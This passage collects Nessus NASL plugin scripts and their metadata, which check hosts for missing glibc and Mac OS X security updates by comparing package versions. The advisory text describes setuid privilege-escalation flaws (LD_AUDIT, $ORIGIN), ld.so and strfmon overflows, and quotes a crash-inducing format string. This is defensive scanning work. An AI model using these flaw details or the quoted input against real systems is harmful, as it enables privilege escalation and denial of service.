(rpm_check(release:"SLES11", sp:0, reference:"glibc-html-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, reference:"glibc-i18ndata-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, reference:"glibc-info-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, reference:"glibc-locale-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, reference:"glibc-profile-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, reference:"nscd-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-devel-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-locale-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-profile-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-devel-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-locale-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-profile-32bit-2.9-13.11.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"glibc-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"glibc-devel-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"glibc-html-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"glibc-i18ndata-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"glibc-info-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"glibc-locale-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"glibc-profile-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, reference:"nscd-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-devel-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-locale-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-profile-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-devel-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-locale-32bit-2.11.1-0.20.1")) flag++; if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-profile-32bit-2.11.1-0.20.1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family Mandriva Local Security Checks NASL id MANDRIVA_MDVSA-2010-111.NASL description Multiple vulnerabilities was discovered and fixed in glibc : Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880). Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in the strfmon implementation in the GNU C Library (aka glibc or libc6) before 2.10.1 allows context-dependent attackers to cause a denial of service (application crash) via a crafted format string, as demonstrated by the %99999999999999999999n string, a related issue to CVE-2008-1391 (CVE-2009-4881). nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function (CVE-2010-0015). The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request (CVE-2010-0296). Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header (CVE-2010-0830). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=4 90 The updated packages have been patched to correct these issues. last seen 2020-06-01 modified 2020-06-02 plugin id 46849 published 2010-06-09 reporter This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/46849 title Mandriva Linux Security Advisory : glibc (MDVSA-2010:111) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Mandriva Linux Security Advisory MDVSA-2010:111. # The text itself is copyright (C) Mandriva S.A. # include("compat.inc"); if (description) { script_id(46849); script_version("1.12"); script_cvs_date("Date: 2019/08/02 13:32:53"); script_cve_id("CVE-2009-4880", "CVE-2009-4881", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830"); script_bugtraq_id(36443, 37885, 40063); script_xref(name:"MDVSA", value:"2010:111"); script_name(english:"Mandriva Linux Security Advisory : glibc (MDVSA-2010:111)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value: "The remote Mandriva Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Multiple vulnerabilities was discovered and fixed in glibc : Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880). Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in the strfmon implementation in the GNU C Library (aka glibc or libc6) before 2.10.1 allows context-dependent attackers to cause a denial of service (application crash) via a crafted format string, as demonstrated by the %99999999999999999999n string, a related issue to CVE-2008-1391 (CVE-2009-4881). nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function (CVE-2010-0015). The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request (CVE-2010-0296). Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header (CVE-2010-0830). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=4 90 The updated packages have been patched to correct these issues." ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_cwe_id(255); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc-pdf"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-i18ndata"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-profile"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-static-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-utils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:nscd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2008.0"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.0"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.1"); script_set_attribute(attribute:"patch_publication_date", value:"2010/06/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/06/09"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc."); script_family(english:"Mandriva Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux"); if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu); flag = 0; if (rpm_check(release:"MDK2008.0", reference:"glibc-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"glibc-devel-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"glibc-doc-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"glibc-doc-pdf-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"glibc-i18ndata-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"glibc-profile-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"glibc-static-devel-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"glibc-utils-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2008.0", reference:"nscd-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-devel-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-doc-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-doc-pdf-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-i18ndata-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-profile-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-static-devel-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"glibc-utils-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.0", reference:"nscd-2.8-1.20080520.5.5mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-devel-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-doc-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-doc-pdf-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-i18ndata-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-profile-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-static-devel-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"glibc-utils-2.9-0.20081113.5.1mnb2")) flag++; if (rpm_check(release:"MDK2009.1", reference:"nscd-2.9-0.20081113.5.1mnb2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family SuSE Local Security Checks NASL id SUSE_11_2_GLIBC-101027.NASL description This update of glibc fixes various bugs and security issues : CVE-2010-3847: Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. CVE-2010-3856: The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. CVE-2010-0830: Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. CVE-2010-0296: The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. CVE-2008-1391: The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). last seen 2020-06-01 modified 2020-06-02 plugin id 50373 published 2010-10-28 reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/50373 title openSUSE Security Update : glibc (openSUSE-SU-2010:0913-1) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update glibc-3400. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(50373); script_version("1.11"); script_cvs_date("Date: 2019/10/25 13:36:38"); script_cve_id("CVE-2008-1391", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856"); script_name(english:"openSUSE Security Update : glibc (openSUSE-SU-2010:0913-1)"); script_summary(english:"Check for the glibc-3400 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update of glibc fixes various bugs and security issues : CVE-2010-3847: Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. CVE-2010-3856: The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. CVE-2010-0830: Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. CVE-2010-0296: The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. CVE-2008-1391: The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon()." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=375315" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=572188" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=592941" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=594263" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=646960" ); script_set_attribute( attribute:"see_also", value:"https://lists.opensuse.org/opensuse-updates/2010-10/msg00040.html" ); script_set_attribute( attribute:"solution", value:"Update the affected glibc packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(189); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-html"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-i18ndata"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-info"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-obsolete"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-profile"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-profile-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:nscd"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.2"); script_set_attribute(attribute:"patch_publication_date", value:"2010/10/27"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/28"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE11\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.2", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE11.2", reference:"glibc-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"glibc-devel-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"glibc-html-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"glibc-i18ndata-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"glibc-info-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"glibc-locale-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"glibc-obsolete-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"glibc-profile-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"nscd-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-32bit-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-devel-32bit-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-locale-32bit-2.10.1-10.9.1") ) flag++; if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-profile-32bit-2.10.1-10.9.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc"); }NASL family MacOS X Local Security Checks NASL id MACOSX_10_5_6.NASL description The remote host is running a version of Mac OS X 10.5.x that is prior to 10.5.6. Mac OS X 10.5.6 contains security fixes for the following products : - ATS - BOM - CoreGraphics - CoreServices - CoreTypes - Flash Player Plug-in - Kernel - Libsystem - Managed Client - network_cmds - Podcast Producer - UDF last seen 2020-06-01 modified 2020-06-02 plugin id 35111 published 2008-12-16 reporter This script is Copyright (C) 2008-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/35111 title Mac OS X 10.5.x < 10.5.6 Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # if (!defined_func("bn_random")) exit(0); if (NASL_LEVEL < 3004) exit(0); include("compat.inc"); if (description) { script_id(35111); script_version("1.21"); script_cvs_date("Date: 2018/07/14 1:59:35"); script_cve_id( "CVE-2008-1391", "CVE-2008-3170", "CVE-2008-3623", "CVE-2008-4217", "CVE-2008-4218", "CVE-2008-4219", "CVE-2008-4220", "CVE-2008-4221", "CVE-2008-4222", "CVE-2008-4223", "CVE-2008-4224", "CVE-2008-4234", "CVE-2008-4236", "CVE-2008-4237", "CVE-2008-4818", "CVE-2008-4819", "CVE-2008-4820", "CVE-2008-4821", "CVE-2008-4822", "CVE-2008-4823", "CVE-2008-4824" ); script_bugtraq_id( 28479, 30192, 32129, 32291, 32870, 32872, 32873, 32874, 32875, 32876, 32877, 32879, 32880, 32881 ); script_name(english:"Mac OS X 10.5.x < 10.5.6 Multiple Vulnerabilities"); script_summary(english:"Check the version of Mac OS X"); script_set_attribute(attribute:"synopsis", value: "The remote host is missing a Mac OS X update that fixes various security issues." ); script_set_attribute(attribute:"description", value: "The remote host is running a version of Mac OS X 10.5.x that is prior to 10.5.6. Mac OS X 10.5.6 contains security fixes for the following products : - ATS - BOM - CoreGraphics - CoreServices - CoreTypes - Flash Player Plug-in - Kernel - Libsystem - Managed Client - network_cmds - Podcast Producer - UDF" ); script_set_attribute(attribute:"see_also", value:"http://support.apple.com/kb/HT3338" ); script_set_attribute(attribute:"see_also", value:"http://lists.apple.com/archives/security-announce/2008/Dec/msg00000.html" ); script_set_attribute(attribute:"solution", value: "Upgrade to Mac OS X 10.5.6 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_cwe_id(20, 79, 119, 189, 200, 264, 287, 399); script_set_attribute(attribute:"plugin_publication_date", value: "2008/12/16"); script_set_attribute(attribute:"patch_publication_date", value: "2008/12/15"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:mac_os_x"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"MacOS X Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc."); script_dependencies("ssh_get_info.nasl", "os_fingerprint.nasl"); exit(0); } os = get_kb_item("Host/MacOSX/Version"); if (!os) os = get_kb_item("Host/OS"); if (!os) exit(0); if (ereg(pattern:"Mac OS X 10\.5\.[0-5]([^0-9]|$)", string:os)) security_hole(0);NASL family SuSE Local Security Checks NASL id SUSE9_12641.NASL description Several security issues were fixed : - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) Also one non-security issue was fixed: - nscd in the paranoia mode would crash on the periodic restart in case one of the databases was disabled in the nscd configuration. In addition, the timezone information was updated to the level of 2010l, including the following changes : - Africa/Cairo (Egypt) and Asia/Gaza (Palestine) do not use daylight saving during the month of Ramadan in order to prevent Muslims from fasting one hour longer. http://www.timeanddate.com/news/time/egypt-ends-dst-2010 .html http://www.timeanddate.com/news/time/westbank-gaza-end-d st-2010.html - Africa/Casablanca (Marocco) has spent the period from May 2 to Aug 8 using daylight saving. Marocco adopted regular daylight saving, but the start and end dates vary every year. http://www.timeanddate.com/news/time/morocco-starts-dst- 2010.html - America/Argentina/San_Luis (Argentina region) local government did not terminate its DST period as planned and instead decided to extend its use of the UTC-3 time indefinitely. http://www.worldtimezone.com/dst_news/dst_news_argentina 08.html New zones : - America/Bahia_Banderas (Mexican state of Nayarit) has declared that it is to follow the UCT-6 time instead of UCT-7, with the aim to have the same time as the nearby city of Puerto Vallarta. http://www.worldtimezone.com/dst_news/dst_news_mexico08. html Historical changes : - Asia/Taipei information on DST usage listed 1980 as one year using DST, which should read 1979 instead according to government resources. - Europe/Helsinki, before switching to Central European standard DST in 1983, trialled DST for two years. However, the database omitted to specify that in these trials of 1981 and 1982, switches have been made one hour earlier than in 1983. Spelling changes in Micronesia: - Pacific/Truk has been renamed to Pacific/Chuuk in 1989. - Pacific/Ponape has been renamed to Pacific/Pohnpei in 1984. last seen 2020-06-01 modified 2020-06-02 plugin id 49758 published 2010-10-06 reporter This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/49758 title SuSE9 Security Update : glibc (YOU Patch Number 12641) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The text description of this plugin is (C) Novell, Inc. # if (NASL_LEVEL < 3000) exit(0); include("compat.inc"); if (description) { script_id(49758); script_version("1.4"); script_cvs_date("Date: 2019/10/25 13:36:37"); script_cve_id("CVE-2008-1391", "CVE-2010-0296", "CVE-2010-0830"); script_name(english:"SuSE9 Security Update : glibc (YOU Patch Number 12641)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote SuSE 9 host is missing a security-related patch." ); script_set_attribute( attribute:"description", value: "Several security issues were fixed : - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) Also one non-security issue was fixed: - nscd in the paranoia mode would crash on the periodic restart in case one of the databases was disabled in the nscd configuration. In addition, the timezone information was updated to the level of 2010l, including the following changes : - Africa/Cairo (Egypt) and Asia/Gaza (Palestine) do not use daylight saving during the month of Ramadan in order to prevent Muslims from fasting one hour longer. http://www.timeanddate.com/news/time/egypt-ends-dst-2010 .html http://www.timeanddate.com/news/time/westbank-gaza-end-d st-2010.html - Africa/Casablanca (Marocco) has spent the period from May 2 to Aug 8 using daylight saving. Marocco adopted regular daylight saving, but the start and end dates vary every year. http://www.timeanddate.com/news/time/morocco-starts-dst- 2010.html - America/Argentina/San_Luis (Argentina region) local government did not terminate its DST period as planned and instead decided to extend its use of the UTC-3 time indefinitely. http://www.worldtimezone.com/dst_news/dst_news_argentina 08.html New zones : - America/Bahia_Banderas (Mexican state of Nayarit) has declared that it is to follow the UCT-6 time instead of UCT-7, with the aim to have the same time as the nearby city of Puerto Vallarta. http://www.worldtimezone.com/dst_news/dst_news_mexico08. html Historical changes : - Asia/Taipei information on DST usage listed 1980 as one year using DST, which should read 1979 instead according to government resources. - Europe/Helsinki, before switching to Central European standard DST in 1983, trialled DST for two years. However, the database omitted to specify that in these trials of 1981 and 1982, switches have been made one hour earlier than in 1983. Spelling changes in Micronesia: - Pacific/Truk has been renamed to Pacific/Chuuk in 1989. - Pacific/Ponape has been renamed to Pacific/Pohnpei in 1984." ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2008-1391.html" ); script_set_attribute( attribute:"see_also", value:"http://support.novell.com/security/cve/CVE-2010-0296.html" ); script_set_attribute( attribute:"see_also", 